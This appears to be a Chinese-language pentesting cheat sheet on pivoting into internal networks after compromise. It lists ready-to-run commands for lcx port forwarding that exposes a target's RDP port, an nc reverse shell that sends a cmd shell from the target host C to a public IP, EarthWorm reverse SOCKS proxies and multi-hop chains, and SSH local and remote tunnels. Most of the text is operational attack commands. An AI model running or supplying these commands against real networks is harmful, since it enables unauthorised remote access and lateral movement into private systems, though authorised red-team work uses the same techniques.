前言

在内网渗透的过程中，我们会碰到一些列的复杂网络环境。因此如何穿透内网环境是渗透过程中必须要考虑的事。

lcx

情景：
本地内网主机：A
公网主机：B
目标内网主机：C

C可以访问公网，不能被公网访问

命令：
C：lcx.exe -slave 47.101.36.165 7777 127.0.0.1 3389
B：lcx.exe -listen 7777 8888

此时，可以主机A可以通过访问公网IP加端口8888来连接内网主机C的3389

nc

情景：
本地内网主机：A
公网主机：B
目标内网主机：C

C可以访问公网，不能被公网访问

命令：
B：nc -lvvp 8888
C：nc -t -e cmd 47.101.36.165 8888

此时，公网主机B能收到内网主机C的反弹cmd

ew

情景1：

本地内网主机：A
公网主机：B
目标内网主机：C
目标内网主机：D

C主机可以访问公网，也可以访问内网，外网主机不能访问主机C和D

命令：
B：ew_linux_x64 -s rcsocks -l 8008 -e 7777
C：ew_win32.exe -s rssocks -d 47.101.36.165 -e 7777

情景2：

本地内网主机：A
公网主机：B
目标内网主机：C
目标内网主机：D

C主机有公网IP和内网IP，只能访问内网D主机，无法访问其他内网主机，D主机无法访问外网

命令：
D：ew_linux_x64 -s ssocksd -l 8888
C：ew_win32.exe -s lcx_tran -l 1080 -f 192.168.100.244 -g 8888

再通过公网IP加端口就可以达到通过D主机访问内网资源的目的

情景3：

本地内网主机：A
公网主机：B
目标内网主机：C
目标内网主机：D

C主机可以访问外网，仅能访问内网D主机，D主机不能访问外网，可以访问内网资源

B：ew_linux_x64 -s lcx_listen -l 8008 -e 8009
D：ew_linux_x64 -s ssocksd -l 9999
C：ew_win32.exe -lcx_slave -d 47.101.36.165 -e 8009 -f 192.168.100.244 -g 9999

此时，可以通过公网IP加端口作为代理，访问内网资源

三级跳例子：
./ew -s rcsocks -l 1080 -e 8888
./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
./ew -s lcx_listen -l 9999 -e 7777
./ew -s rssocks -d 127.0.0.1 -e 7777
数据流向为 IE -> 1080 -> 8888 -> 9999 -> 7777 -> rssocks

ssh

情景1：

本地主机A
公网主机B

公网主机B存在mysql服务，但只能主机B本地访问

命令：
C：ssh -CfNg -L 1234 127.0.0.1:3306 root@47.101.36.165

此时，我们可以通过mysql -h 127.0.0.1 -u root -p -P 1234 来连接公网主机B的mysql

情景2：

本地主机A
公网主机B
目标主机C

公网主机C可以访问外网，不可以被之间访问
采用远程转发，将主机C的端口转发至主机B，此时访问主机B的端口，即访问主机C的端口

命令：
C：ssh -CfNg -R 7777:127.0.0.1:80 root@47.101.36.176

此时，访问公网主机B的IP加7777端口即为访问主机C的80端口